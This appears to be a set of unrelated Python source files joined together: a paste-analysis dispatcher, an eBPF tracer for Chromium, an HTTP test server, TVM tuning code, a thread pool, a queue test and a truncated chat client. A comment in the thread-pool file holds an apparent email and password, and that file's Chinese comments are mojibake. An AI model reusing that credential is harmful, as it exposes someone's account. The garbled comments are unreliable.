def add_analyzer(self, analyzer):
"""Adds an analyzer to the list of analyzers"""
with self.__lock:
self.analyzers.append(analyzer)
def start(self, workers=4, ready=None):
"""Starts dispatching the downloaded pastes to the list of analyzers"""
with self.__lock:
if not self.running:
if len(self.analyzers) == 0:
self.logger.warning("No analyzers added! At least one analyzer must be added prior to use!")
return None
self.running = True
thread = start_thread(self._start_analyzing, "PasteDispatcher", exception_event=self.__exception_event)
self.__threads.append(thread)
# Start thread pool with worker threads
# for i in range(workers):
# thread = Thread(target=self._pool_thread, name="analyzer_{0}".format(i))
# self.__thread_pool.add(thread)
# thread.start()
if ready is not None:
ready.set()
return self.action_queue
def _start_analyzing(self):
while self.running:
try:
# Get paste from queue
paste = self.paste_queue.get(True, 1)
# TODO implement thread pool to limit number of parallel executed threads
# Don't add these threads to the list. Otherwise they will just block the list
start_thread(self._process_paste, "process_paste", paste=paste, exception_event=self.__exception_event)
except Empty:
if self.__stop_event.is_set():
self.logger.debug("orderly stopping")
self.running = False
break
elif self.__exception_event.is_set():
self.logger.critical("stopping due to exception in another thread")
self.running = False
break
continue
def _process_paste(self, paste):
self.logger.debug("Analyzing Paste: {0}".format(paste.key))
for analyzer in self.analyzers:
if analyzer.match(paste):
actions = analyzer.actions
self.action_queue.put((actions, paste, analyzer))
def stop(self):
"""Stops dispatching pastes to the analyzers"""
self.__stop_event.set()
while self.running:
sleep(0.1)
self.__stop_event.clear()
join_threads(self.__threads)
self.__threads = []
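# --- Illustrative usage sketch (an assumption, not shipped with pastepwn) ---
# Shows the analyzer contract the dispatcher relies on: an analyzer exposes
# an `actions` attribute and a `match(paste)` method, and matching pastes are
# forwarded to the action queue as (actions, paste, analyzer) tuples.
if __name__ == "__main__":
    from collections import namedtuple

    DummyPaste = namedtuple("DummyPaste", ["key", "body"])

    class KeywordAnalyzer(object):
        """Hypothetical analyzer matching pastes whose body contains a keyword."""
        def __init__(self, keyword):
            self.keyword = keyword
            self.actions = []  # real analyzers carry pastepwn actions here

        def match(self, paste):
            return self.keyword in paste.body

    paste_queue = Queue()
    dispatcher = PasteDispatcher(paste_queue)
    dispatcher.add_analyzer(KeywordAnalyzer("password"))
    action_queue = dispatcher.start()
    paste_queue.put(DummyPaste(key="abc123", body="a password leak"))
    actions, paste, analyzer = action_queue.get(timeout=5)
    print("matched paste:", paste.key)
    dispatcher.stop()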
|
onefunctime.py | #!/usr/bin/python
from bcc import BPF
import Tkinter as tk
import threading
from multiprocessing import Process
import signal, os
from time import sleep
def runbpf(self, name, sym):
# print("nanananana %s"%name)
# print("lalalalala %s"%sym)
bpf_source = """
BPF_HASH(cache, u64, u64);
BPF_ARRAY(avg, u64, 2);
int trace_start_time(struct pt_regs *ctx) {
//u64 pid = bpf_get_current_pid_tgid();
u64 funid = 1;
u64 start_time_ns = bpf_ktime_get_ns();
cache.update(&funid, &start_time_ns);
return 0;
}
"""
bpf_source += """
int print_duration(struct pt_regs *ctx) {
//u64 pid = bpf_get_current_pid_tgid();
u64 funid = 1;
u64 *start_time_ns = cache.lookup(&funid);
if (start_time_ns == 0) {
return 0;
}
u64 duration_ns = bpf_ktime_get_ns() - *start_time_ns;
cache.delete(&funid);
u32 lat = 0;
u32 cnt = 1;
u64 *sum = avg.lookup(&lat);
if (sum) lock_xadd(sum, duration_ns);
u64 *cnts = avg.lookup(&cnt);
if (cnts) lock_xadd(cnts, 1);
bpf_trace_printk("Function: blink::V8ScriptRunner::CompileAndRunScript call duration: %d us\\n", duration_ns/1000);
return 0;
}
"""
print("--")
#bpf_source += bpf_source1
bpf = BPF(text = bpf_source)
bpf.attach_uprobe(name = "/home/bytedance/graduation_project/chromium/src/out/Default/out/Debug/libblink_core.so", sym = "_ZN5blink14V8ScriptRunner17RunCompiledScriptEPN2v87IsolateENS1_5LocalINS1_6ScriptEEEPNS_16ExecutionContextE", fn_name = "trace_start_time")
bpf.attach_uretprobe(name = "/home/bytedance/graduation_project/chromium/src/out/Default/out/Debug/libblink_core.so", sym = "_ZN5blink14V8ScriptRunner17RunCompiledScriptEPN2v87IsolateENS1_5LocalINS1_6ScriptEEEPNS_16ExecutionContextE", fn_name = "print_duration")
#bpf.attach_uprobe(name = name , sym = sym, fn_name = "trace_start_time")
#bpf.attach_uretprobe(name = name, sym = sym, fn_name = "print_duration")
#bpf.trace_print()
'''
while(1):
sleep(1);
total = bpf['avg'][0].value
counts = bpf['avg'][1].value
if counts > 0:
avg = total/counts
print("\n------------------------avg = %ld us, total: %ld us, count: %ld\n" %(total/counts, total, counts))
'''
#/home/bytedance/graduation_project/chromium/src/out/Default/out/Debug/libblink_core.so
#_ZN5blink14V8ScriptRunner17RunCompiledScriptEPN2v87IsolateENS1_5LocalINS1_6ScriptEEEPNS_16ExecutionContextE
#def worker(arg):
# runbpf()
global process1
def runbpfprocess(self,name,sym):
#process1=Process(target=runbpf,kwargs={'name':name,'sym':sym})
#process1.start()
t1 = threading.Thread(target=runbpf,kwargs={'self':self,'name':name,'sym':sym})
t1.start()
def printexit(signum, frame):
# signal handlers receive the signal number and the current stack frame
print("process exit")
def sendexit():
signal.signal(signal.SIGINT, printexit)
os.kill(os.getpid(), signal.SIGINT)
'''
window = tk.Tk()
window.title('My Window')
window.geometry('500x300')
e = tk.Entry(window, show = None)
e.pack()
f = tk.Entry(window, show = None)
f.pack()
def insert_point():
var = e.get()
print (var)
t.insert('insert', var)
def insert_end():
var = f.get()
t.insert('end', var)
b1 = tk.Button(window, text='insert point', width=10,
height=2, command=runbpfprocess)
b1.pack()
b2 = tk.Button(window, text='insert end', width=10,
height=2, command=sendexit)
b2.pack()
t = tk.Text(window, height=3)
t.pack()
window.mainloop()
''' |
httpserver.py | #
# SPDX-License-Identifier: MIT
#
import http.server
import multiprocessing
import os
import traceback
import signal
from socketserver import ThreadingMixIn
class HTTPServer(ThreadingMixIn, http.server.HTTPServer):
def server_start(self, root_dir, logger):
os.chdir(root_dir)
self.serve_forever()
class HTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
def log_message(self, format_str, *args):
pass
class HTTPService(object):
def __init__(self, root_dir, host='', logger=None):
self.root_dir = root_dir
self.host = host
self.port = 0
self.logger = logger
def start(self):
if not os.path.exists(self.root_dir):
self.logger.info("Not starting HTTPService for directory %s which doesn't exist" % (self.root_dir))
return
self.server = HTTPServer((self.host, self.port), HTTPRequestHandler)
if self.port == 0:
self.port = self.server.server_port
self.process = multiprocessing.Process(target=self.server.server_start, args=[self.root_dir, self.logger])
# The signal handler from testimage.bbclass can cause deadlocks here
# if the HTTPServer is terminated before it can restore the standard
# signal behaviour
orig = signal.getsignal(signal.SIGTERM)
signal.signal(signal.SIGTERM, signal.SIG_DFL)
self.process.start()
signal.signal(signal.SIGTERM, orig)
if self.logger:
self.logger.info("Started HTTPService on %s:%s" % (self.host, self.port))
def stop(self):
if hasattr(self, "server"):
self.server.server_close()
if hasattr(self, "process"):
self.process.terminate()
self.process.join()
if self.logger:
self.logger.info("Stopped HTTPService on %s:%s" % (self.host, self.port))
|
ThreadStoppable.py | import threading
import queue
class ThreadStoppable(object):
def __init__(self, target_to_loop, timeout=-1, args=()):
self._target_to_loop = target_to_loop
self._args = args
self._timeout = timeout
self.queue = queue.Queue()
self.start()
def loop(self):
while not self._stop_loop:
r = self._target_to_loop(*self._args)
self.queue.put(r)
def stop(self):
self._stop_loop = True
def start(self):
# validate the timeout before spawning the thread
assert self._timeout > 0 or self._timeout == -1, \
'Invalid timeout value given.'
self._stop_loop = False
self.thread = threading.Thread(target=self.loop)
self.thread.start()
if self._timeout > 0:
t = threading.Timer(self._timeout, self.stop)
t.start()
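# --- Illustrative usage sketch (an assumption, not part of the class) ---
# Runs a small producer in a loop for ~0.5 s; each iteration's return value
# lands on the instance queue, and stop() ends the loop explicitly.
if __name__ == "__main__":
    import itertools
    import time

    counter = itertools.count()

    def produce():
        time.sleep(0.05)
        return next(counter)

    worker = ThreadStoppable(produce)
    time.sleep(0.5)
    worker.stop()
    worker.thread.join()
    print("results collected:", worker.queue.qsize())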
|
measure_methods.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name,too-many-function-args,too-many-nested-blocks
"""
Functions that run on executor for measurement.
These functions are responsible for building the tvm module, uploading it to
remote devices, recording the running time costs, and checking the correctness of the output.
"""
import logging
import shutil
import os
import threading
import time
from random import getrandbits
from collections import namedtuple
import tempfile
import numpy as np
import tvm._ffi
from tvm import nd, rpc as _rpc, target as _target
from tvm.error import TVMError
from tvm.target import build_config
from tvm.driver import build
from tvm.contrib import nvcc, ndk, tar
from ..util import get_const_tuple
from ..env import AutotvmGlobalScope
from ..task.space import InstantiationError
from .measure import MeasureResult, MeasureErrorNo, Builder, Runner
from .local_executor import LocalExecutor
logger = logging.getLogger('autotvm')
class BuildResult(namedtuple("BuildResult", ('filename', 'arg_info', 'error', 'time_cost'))):
"""
Stores all the necessary inputs for a measurement.
Parameters
----------
filename : str
The filename of generated library
arg_info : Tuple
The shape and dtype information of tvm tensor arguments
error : Exception
The error happens during compilation.
time_cost : float
The time cost of building
"""
class LocalBuilder(Builder):
"""Run compilation on local machine
Parameters
----------
timeout: float
The timeout of a compilation
n_parallel: int
The number of tasks run in parallel. "None" will use all cpu cores
build_func: callable or str
If it is 'default', use the default build function
If it is 'ndk', use the function for android ndk
If it is callable, use it as a custom build function; it is expected to have an output_format attribute.
"""
def __init__(self, timeout=10, n_parallel=None, build_func='default'):
super(LocalBuilder, self).__init__(timeout, n_parallel)
if isinstance(build_func, str):
if build_func == 'default':
build_func = tar.tar
elif build_func == 'ndk':
build_func = ndk.create_shared
else:
raise ValueError("Invalid build_func: " + build_func)
self.build_func = _wrap_build_func(build_func)
self.executor = LocalExecutor(timeout=timeout)
self.tmp_dir = tempfile.mkdtemp()
def build(self, measure_inputs):
results = []
shutil.rmtree(self.tmp_dir, ignore_errors=True)
self.tmp_dir = tempfile.mkdtemp()
for i in range(0, len(measure_inputs), self.n_parallel):
futures = []
for inp in measure_inputs[i:i + self.n_parallel]:
ret = self.executor.submit(self.build_func,
inp,
self.tmp_dir,
**self.build_kwargs)
futures.append(ret)
for future in futures:
res = future.get()
if isinstance(res, Exception):
# timeout or fleet error, return MeasureResult directly
results.append(MeasureResult((res,), MeasureErrorNo.BUILD_TIMEOUT,
self.timeout, time.time()))
elif res.error is not None:
# instantiation error
if isinstance(res.error, InstantiationError):
results.append(MeasureResult((res.error,),
MeasureErrorNo.INSTANTIATION_ERROR,
res.time_cost, time.time()))
else:
if "InstantiationError" in str(res.error):
msg = str(res.error)
try:
msg = msg.split('\n')[-2].split(": ")[1]
except Exception: # pylint: disable=broad-except
pass
results.append(MeasureResult((InstantiationError(msg),),
MeasureErrorNo.INSTANTIATION_ERROR,
res.time_cost, time.time()))
else: # tvm error
results.append(MeasureResult((res.error,),
MeasureErrorNo.COMPILE_HOST,
res.time_cost, time.time()))
else:
# return BuildResult
results.append(res)
return results
class RPCRunner(Runner):
"""Run generated code on remove devices.
This function will ask a RPC Tracker to get device for measurement.
Parameters
----------
timeout: float
The timeout of a compilation
n_parallel: int
The number of tasks run in parallel. "None" will use all cpu cores
key: str
The key of the device registered in the tracker
host: str
The host address of RPC Tracker
port: int
The port of RPC Tracker
number: int
The number of times to run the generated code for taking average.
We call these runs one `repeat` of measurement.
repeat : int, optional
The number of times to repeat the measurement.
In total, the generated code will be run (1 + number x repeat) times,
where the first "1" is warm up and will be discarded.
The returned result contains `repeat` costs,
each of which is an average of `number` costs.
min_repeat_ms: int, optional
The minimum duration of one `repeat` in milliseconds.
By default, one `repeat` contains `number` runs. If this parameter is set,
the parameters `number` will be dynamically adjusted to meet the
minimum duration requirement of one `repeat`.
i.e., When the run time of one `repeat` falls below this time, the `number` parameter
will be automatically increased.
cooldown_interval: float, optional
The cool down interval between two measurements.
check_correctness: bool, optional
Whether check correctness after measurement. This will use llvm cpu target to
call your template and get the reference output.
This can work for TOPI templates, but may not work for your custom template.
"""
def __init__(self,
key, host, port, priority=1,
timeout=10, n_parallel=None,
number=4, repeat=3, min_repeat_ms=0, cooldown_interval=0.1,
check_correctness=False):
super(RPCRunner, self).__init__(timeout, n_parallel)
self.key = key
self.host = host
self.port = port
self.priority = priority
self.timeout = timeout
self.number = number
self.repeat = repeat
self.min_repeat_ms = min_repeat_ms
self.ref_input = None
self.ref_output = None
self.check_correctness = check_correctness
self.cooldown_interval = cooldown_interval
self.executor = LocalExecutor()
def set_task(self, task):
self.task = task
if check_remote(task.target, self.key, self.host, self.port):
logger.info("Get devices for measurement successfully!")
else:
raise RuntimeError("Cannot get remote devices from the tracker. "
"Please check the status of tracker by "
"'python -m tvm.exec.query_rpc_tracker --port [THE PORT YOU USE]' "
"and make sure you have free devices on the queue status.")
if self.check_correctness:
# use llvm cpu to generate a reference input/output
# this option works for tuning topi, but might not work for your custom op
with _target.create("llvm"):
s, arg_bufs = task.instantiate(task.config_space.get(0))
self.ref_input = [np.random.uniform(size=get_const_tuple(x.shape)).astype(x.dtype)
for x in arg_bufs]
func = build(s, arg_bufs, "llvm")
tvm_buf = [nd.array(x) for x in self.ref_input]
func(*tvm_buf)
self.ref_output = [x.asnumpy() for x in tvm_buf]
def get_build_kwargs(self):
kwargs = {}
if 'cuda' in self.task.target.keys or 'opencl' in self.task.target.keys or \
'rocm' in self.task.target.keys:
remote = request_remote(self.key, self.host, self.port)
ctx = remote.context(str(self.task.target), 0)
max_dims = ctx.max_thread_dimensions
kwargs['check_gpu'] = {
'max_shared_memory_per_block': ctx.max_shared_memory_per_block,
'max_threads_per_block': ctx.max_threads_per_block,
'max_thread_x': max_dims[0],
'max_thread_y': max_dims[1],
'max_thread_z': max_dims[2],
}
if 'cuda' in self.task.target.keys:
kwargs["cuda_arch"] = "sm_" + "".join(ctx.compute_version.split('.'))
return kwargs
def run(self, measure_inputs, build_results):
results = []
remote_args = (self.key, self.host, self.port, self.priority, self.timeout)
for i in range(0, len(measure_inputs), self.n_parallel):
futures = []
for measure_inp, build_res in zip(measure_inputs[i:i+self.n_parallel],
build_results[i:i+self.n_parallel]):
ret = self.executor.submit(run_through_rpc,
measure_inp,
build_res,
self.number,
self.repeat,
self.min_repeat_ms,
self.cooldown_interval,
remote_args,
self.ref_input,
self.ref_output)
futures.append(ret)
for future in futures:
res = future.get()
if isinstance(res, Exception): # executor error or timeout
results.append(MeasureResult((str(res),), MeasureErrorNo.RUN_TIMEOUT,
self.timeout, time.time()))
else:
results.append(res)
return results
class LocalRunner(RPCRunner):
"""Run generated code on local devices.
Parameters
----------
timeout: float
The timeout of a compilation
number: int
The number of times to run the generated code for taking average.
We call these runs one `repeat` of measurement.
repeat : int, optional
The number of times to repeat the measurement.
In total, the generated code will be run (1 + number x repeat) times,
where the first one is warm up and will be discarded.
The returned result contains `repeat` costs,
each of which is an average of `number` costs.
min_repeat_ms: int, optional
The minimum duration of one `repeat` in milliseconds.
By default, one `repeat` contains `number` runs. If this parameter is set,
the parameters `number` will be dynamically adjusted to meet the
minimum duration requirement of one `repeat`.
i.e., When the run time of one `repeat` falls below this time, the `number` parameter
will be automatically increased.
cooldown_interval: float, optional
The cool down interval between two measurements.
check_correctness: bool, optional
Whether check correctness after measurement. This will use llvm cpu target to
call your template and get the reference output.
This can work for TOPI templates, but may not work for your custom template.
Note
----
This is a "fake" local mode. We start a silent rpc tracker and rpc server
for the user. In this way we reuse timeout/isolation mechanism in RPC infrastructure.
"""
def __init__(self,
timeout=10,
number=4, repeat=3, min_repeat_ms=0, cooldown_interval=0.1,
check_correctness=False):
super(LocalRunner, self).__init__('', None, None, 0,
timeout=timeout, n_parallel=1,
number=number, repeat=repeat,
min_repeat_ms=min_repeat_ms,
cooldown_interval=cooldown_interval,
check_correctness=check_correctness)
self.tracker = None
self.server = None
def set_task(self, task):
# pylint: disable=import-outside-toplevel
from ...rpc.tracker import Tracker
from ...rpc.server import Server
self.task = task
tracker = Tracker('0.0.0.0', port=9000, port_end=10000, silent=True)
device_key = '$local$device$%d' % tracker.port
server = Server('0.0.0.0', port=9000, port_end=10000,
key=device_key,
use_popen=True, silent=True,
tracker_addr=(tracker.host, tracker.port))
self.key = device_key
self.host = tracker.host
self.port = tracker.port
super(LocalRunner, self).set_task(task)
return server, tracker
def _build_func_common(measure_input, check_gpu=None, cuda_arch=None, build_option=None):
"""Common part for building a configuration"""
target, task, config = measure_input
with target:
s, args = task.instantiate(config)
# check invalidity of template and code hash consistency
if not config.valid():
raise InstantiationError(config.errors)
opts = build_option or {}
if check_gpu: # Add verify pass to filter out invalid configs in advance.
opts["add_lower_pass"] = [(2, gpu_verify_pass(**check_gpu))]
if cuda_arch:
set_cuda_target_arch(cuda_arch)
# if target is vta, we need to use vta build
if hasattr(measure_input.target, 'device_name') and \
measure_input.target.device_name == 'vta':
# pylint: disable=import-outside-toplevel
import vta
func = vta.build(s, args, target_host=task.target_host)
else:
with build_config(**opts):
func = build(s, args, target_host=task.target_host)
return func, tuple((get_const_tuple(x.shape), x.dtype) for x in args)
def _wrap_build_func(build_func):
"""
Wrap build_func to a function that can be used in measure.
Parameters
----------
build_func : The compilation function
We expect fcompile to contain an attr "output_format"
Returns
-------
wrapped_build_func : function
The wrapped build function
"""
if not hasattr(build_func, "output_format"):
raise AttributeError("Expect build_func to have the attribute output_format.")
output_format = build_func.output_format
def _wrapped(measure_input, tmp_dir, **kwargs):
"""
Wrapped build func.
Parameters
----------
measure_input: MeasureInput
The input of measurement
tmp_dir: str
The path of temporary directory to export generated library
"""
tic = time.time()
try:
filename = os.path.join(tmp_dir, "tmp_func_%0x.%s" % (
getrandbits(64), output_format))
# TODO(tvm-team) consider inlining _build_func_common
func, arg_info = _build_func_common(measure_input, **kwargs)
func.export_library(filename, build_func)
except Exception as e: # pylint: disable=broad-except
return BuildResult(None, None, e, time.time() - tic)
return BuildResult(filename, arg_info, None, time.time() - tic)
return _wrapped
def run_through_rpc(measure_input, build_result,
number, repeat, min_repeat_ms, cooldown_interval,
remote_args, ref_input=None, ref_output=None):
"""Run a generated library through rpc
Parameters
----------
measure_input: MeasureInput
The raw measure input
build_result: BuildResult
The result returned from Builder. This contains the path to the generated library.
number: int
The number of times to run the generated code for taking average.
We call these runs one `repeat` of measurement.
repeat : int, optional
The number of times to repeat the measurement.
In total, the generated code will be run (1 + number x repeat) times,
where the first one is warm up and will be discarded.
The returned result contains `repeat` costs,
each of which is an average of `number` costs.
min_repeat_ms: int, optional
The minimum duration of one `repeat` in milliseconds.
By default, one `repeat` contains `number` runs. If this parameter is set,
the parameters `number` will be dynamically adjusted to meet the
minimum duration requirement of one `repeat`.
i.e., When the run time of one `repeat` falls below this time, the `number` parameter
will be automatically increased.
cooldown_interval: float
The cool down interval between two measurements
remote_args: Tuple
The argument for request_remote
ref_input: List of np.ndarray
The reference input used for checking correctness
ref_output: List of np.ndarray
The reference output used for checking correctness
"""
if isinstance(build_result, MeasureResult):
return build_result
tic = time.time()
errno = MeasureErrorNo.NO_ERROR
try:
# upload built module
remote = request_remote(*remote_args)
# Program the FPGA every single time when targeting VTA
if hasattr(measure_input.target, 'device_name') and \
measure_input.target.device_name == 'vta':
# pylint: disable=import-outside-toplevel
from vta import program_fpga, reconfig_runtime
program_fpga(remote, None)
reconfig_runtime(remote)
remote.upload(build_result.filename)
func = remote.load_module(os.path.split(build_result.filename)[1])
ctx = remote.context(str(measure_input.target), 0)
time_f = func.time_evaluator(
func.entry_name, ctx, number=number, repeat=repeat, min_repeat_ms=min_repeat_ms)
# set input
if ref_input:
args = [nd.array(x, ctx=ctx) for x in ref_input]
else:
# create empty arrays on the remote device and copy them once.
# This can avoid some memory issues that make the measurement results unreliable.
args = [nd.empty(x[0], dtype=x[1], ctx=ctx) for x in build_result.arg_info]
args = [nd.array(x, ctx=ctx) for x in args]
ctx.sync()
costs = time_f(*args).results
# clean up remote files
remote.remove(build_result.filename)
remote.remove(os.path.splitext(build_result.filename)[0] + '.so')
remote.remove('')
if len(costs) > 2: # remove largest and smallest value to reduce variance
costs = list(costs)
costs.sort()
costs = tuple(costs[1:-1])
# check correctness of output
if ref_output:
for expected, real in zip(ref_output, args):
if not np.allclose(expected, real.asnumpy(), rtol=1e-4):
logger.warning("Wrong Answer!")
errno = MeasureErrorNo.WRONG_ANSWER
except TVMError as exc:
msg = str(exc)
if "Stack trace returned" in msg:
msg = msg[:msg.index("Stack trace returned")]
if "CUDA Source" in msg:
msg = msg[:msg.index("CUDA Source")]
costs = (RuntimeError(msg[:1024]),)
errno = MeasureErrorNo.RUNTIME_DEVICE
tstamp = time.time()
time.sleep(cooldown_interval)
return MeasureResult(costs, errno, tstamp - tic + build_result.time_cost, tstamp)
def request_remote(device_key, host=None, port=None, priority=1, timeout=60):
"""Request a remote session
Parameters
----------
device_key: string
The device key of registered device in tracker
host: str, optional
The host address of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_HOST"
port: int, optional
The port of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_PORT"
priority: int, optional
The priority of this request, larger is more prior
timeout: float, optional
The timeout of this session (units: second)
Returns
------
session: RPCSession
"""
# connect to the tracker
host = host or os.environ['TVM_TRACKER_HOST']
port = port or int(os.environ['TVM_TRACKER_PORT'])
tracker = _rpc.connect_tracker(host, port)
remote = tracker.request(device_key, priority=priority,
session_timeout=timeout)
return remote
def check_remote(target, device_key, host=None, port=None, priority=100, timeout=10):
"""
Check the availability of a remote device
Parameters
----------
target: Target
The wanted compilation target
device_key: string
device key of registered device in tracker
host: str, optional
The host address of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_HOST"
port: int, optional
The port address of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_PORT"
priority: int, optional
The priority of this request, larger is more prior
timeout: float, optional
The timeout of this check (units: seconds).
Returns
-------
available: bool
True if can find available device
"""
def _check():
remote = request_remote(device_key, host, port, priority)
ctx = remote.context(str(target))
while not ctx.exist: # wait until we get an available device
pass
t = threading.Thread(target=_check,)
t.start()
t.join(timeout)
return not t.is_alive()
@tvm._ffi.register_func
def tvm_callback_cuda_compile(code):
"""use nvcc to generate ptx code for better optimization"""
curr_cuda_target_arch = AutotvmGlobalScope.current.cuda_target_arch
# e.g., target arch could be [
# "-gencode", "arch=compute_52,code=sm_52",
# "-gencode", "arch=compute_70,code=sm_70"
# ]
target = "fatbin" if isinstance(curr_cuda_target_arch, list) else "ptx"
ptx = nvcc.compile_cuda(code, target=target, arch=AutotvmGlobalScope.current.cuda_target_arch)
return ptx
def set_cuda_target_arch(arch):
"""set target architecture of nvcc compiler
Parameters
----------
arch: str or list
The argument of nvcc -arch. (e.g. "sm_51", "sm_62")
it can also be a list of gencode arguments passed to the nvcc command line,
e.g., ["-gencode", "arch=compute_52,code=sm_52", "-gencode", "arch=compute_70,code=sm_70"]
"""
AutotvmGlobalScope.current.cuda_target_arch = arch
def gpu_verify_pass(**kwargs):
"""Verify the validity of a gpu kernel.
This pass will check memory usage and number of threads per block.
"""
def verify_pass(f, *_):
valid = tvm.tir.analysis.verify_gpu_code(f, kwargs)
if not valid:
raise InstantiationError("Skipped because of invalid gpu kernel")
return f
return tvm.tir.transform.prim_func_pass(verify_pass, opt_level=0)
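# --- Illustrative usage sketch (an assumption; it mirrors the public autotvm
# API described in the Builder/Runner docstrings above, with `task` as a
# hypothetical placeholder defined elsewhere) ---
#
#     from tvm import autotvm
#
#     measure_option = autotvm.measure_option(
#         builder=autotvm.LocalBuilder(timeout=10),
#         runner=autotvm.LocalRunner(number=4, repeat=3, min_repeat_ms=100),
#     )
#     tuner = autotvm.tuner.RandomTuner(task)
#     tuner.tune(n_trial=20, measure_option=measure_option)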
|
ThreadPool.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import queue
import threading
import contextlib
import time
# from hubSpider.spiders.downloader import xhub
StopEvent = object()
class ThreadPool(object):
def __init__(self, max_num):
self.q = queue.Queue() # queue holding pending tasks
self.max_num = max_num # maximum number of concurrent threads
self.terminal = False # when True, stop all threads and accept no new tasks
self.generate_list = [] # threads created so far
self.free_list = [] # idle threads
self.sum_time = 0
def run(self, func, args, callback=None):
"""
็บฟ็จๆฑ ๆง่กไธไธชไปปๅก
:param func: ไปปๅกๅฝๆฐ
:param args: ไปปๅกๅฝๆฐๆ้ๅๆฐ
:param callback: ไปปๅกๆง่กๅคฑ่ดฅๆๆๅๅๆง่ก็ๅ่ฐๅฝๆฐ๏ผๅ่ฐๅฝๆฐๆไธคไธชๅๆฐ1ใไปปๅกๅฝๆฐๆง่ก็ถๆ๏ผ2ใไปปๅกๅฝๆฐ่ฟๅๅผ๏ผ้ป่ฎคไธบNone๏ผๅณ๏ผไธๆง่กๅ่ฐๅฝๆฐ๏ผ
:return: ๅฆๆ็บฟ็จๆฑ ๅทฒ็ป็ปๆญข๏ผๅ่ฟๅTrueๅฆๅNone
"""
if len(self.free_list) == 0 and len(self.generate_list) < self.max_num: #ๆ ็ฉบ้ฒ็บฟ็จๅไธ่ถ
่ฟๆๅคง็บฟ็จๆฐ
self.generate_thread() # ๅๅปบ็บฟ็จ
w = (func, args, callback,)#ไฟๅญๅๆฐไธบๅ
็ป
self.q.put(w)#ๆทปๅ ๅฐไปปๅก้ๅ
self.sum_time+=1
def generate_thread(self):
"""
ๅๅปบไธไธช็บฟ็จ
"""
t = threading.Thread(target=self.call)
t.start()
def call(self):
"""
ๅพช็ฏๅป่ทๅไปปๅกๅฝๆฐๅนถๆง่กไปปๅกๅฝๆฐ
"""
current_thread = threading.currentThread#่ทๅๅฝๅ็บฟ็จๅฏน่ฑก
self.generate_list.append(current_thread)#ๆทปๅ ๅฐๅทฒๅๅปบ็บฟ็จ้
event = self.q.get() #่ทๅไปปๅก
while event != StopEvent: #ๅฆๆไธไธบๅๆญขไฟกๅท
func, arguments, callback = event#ๅๅซๅๅผ๏ผ
try:
result = func(*arguments) #่ฟ่กๅฝๆฐ๏ผๆ็ปๆ่ตๅผ็ปresult
status = True #่ฟ่ก็ปๆๆฏๅฆๆญฃๅธธ
except Exception as e:
status = False #ไธๆญฃๅธธ
result = e #็ปๆไธบ้่ฏฏไฟกๆฏ
# print(e)
if callback is not None: # ๆฏๅฆๆๅ่ฐๅฝๆฐ
try:
callback(self.sum_time,status, result) #ๆง่กๅ่ฐๅฝๆฐ
except Exception as e:
pass
if self.terminal: # ้ป่ฎคไธบFalse ๏ผๅฆๆ่ฐ็จterminalๆนๆณ
event = StopEvent #ๅๆญขไฟกๅท
else:
# self.free_list.append(current_thread) #ๆง่กๅฎๆฏไปปๅก๏ผๆทปๅ ๅฐ้ฒ็ฝฎๅ่กจ
# event = self.q.get() #่ทๅไปปๅก
# self.free_list.remove(current_thread) #่ทๅๅฐไปปๅกไนๅ๏ผไป้ฒ็ฝฎ้ๅ ้ค
with self.worker_state(self.free_list,current_thread):
event = self.q.get()
else:
self.generate_list.remove(current_thread) #ๅฆๆๆถๅฐ็ปๆญขไฟกๅท๏ผๅฐฑไปๅทฒๅๅปบ็ๅ่กจๅ ้ค
def close(self): # stop the workers once queued tasks are done
num = len(self.generate_list) # number of threads created so far
while num:
self.q.put(StopEvent) # one stop signal per created thread
num -= 1
# Stop the workers immediately (and clear the task queue).
def terminate(self):
self.terminal = True # flip the terminate flag
while self.generate_list: # while created threads are still alive
self.q.put(StopEvent) # keep feeding stop signals
with self.q.mutex:
self.q.queue.clear() # Queue.empty() only tests emptiness, so clear the underlying deque directly
@contextlib.contextmanager
def worker_state(self,free_list,current_thread):
free_list.append(current_thread)
try:
yield
finally:
free_list.remove(current_thread)
def work(i):
# print(i)
pass
pool = ThreadPool(10)
def is_down(i, status, result):
print(i)
print(status)
print(result)
print("task finished")
for item in range(50):
pool.run(func=work, args=(item,), callback=is_down)
# print(result)
# pool.terminate()
pool.close()
# a=xhub("1601684622@qq.com","srx62600")
# pool=ThreadPool(10)
# f=open("../video/video_url.txt",mode="r",encoding="utf-8")
# for i in f:
# pool.run(func=xhub.parse_url,args=(i,))
# print(i)
# pool.close() |
thread_queue_test.py | import pytest
from time import sleep
from threading import Thread
# zthreading's Queue is imported under the stdlib name so the test below
# exercises the zthreading implementation.
from zthreading.thread_queue import Queue
def test_simple_queue():
queue = Queue()
def do_enqueue():
sleep(0.1)
queue.put("valid")
pass
Thread(target=do_enqueue).start()
assert queue.get(timeout=0.2) == "valid"
if __name__ == "__main__":
# test_simple_queue()
pytest.main(["-x", __file__])
|
client.py | import json
import socket
import threading
from dearpygui.core import *
from dearpygui.simple import *
with open('user/settings.hqs', 'r') as usersettings:
user = json.load(usersettings)
with open(f'languages/{user["language"]}.hqs', 'r') as language:
lang = json.load(language)
username = 'test'
FORMAT = 'utf-8'
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def show(msg):
delete_item('ChatWidget')
add_window('ChatWidget', no_title_bar=True, no_move=True,
width=875, height=600, x_pos=400, y_pos=15,
no_resize=False)
add_text(get_value('IP'))
add_separator()
add_text(msg)
def connect(sender, data):
client.connect((get_value('IP'), get_value('Port')))
#rcv = threading.Thread(target=receive)
#rcv.start()
run_async_function(receive, 'RECEIVE FUNCTION')
def sendButton(sender, data):
receive(sender='', data='')
# function to receive messages
def receive(sender, data):
while True:
try:
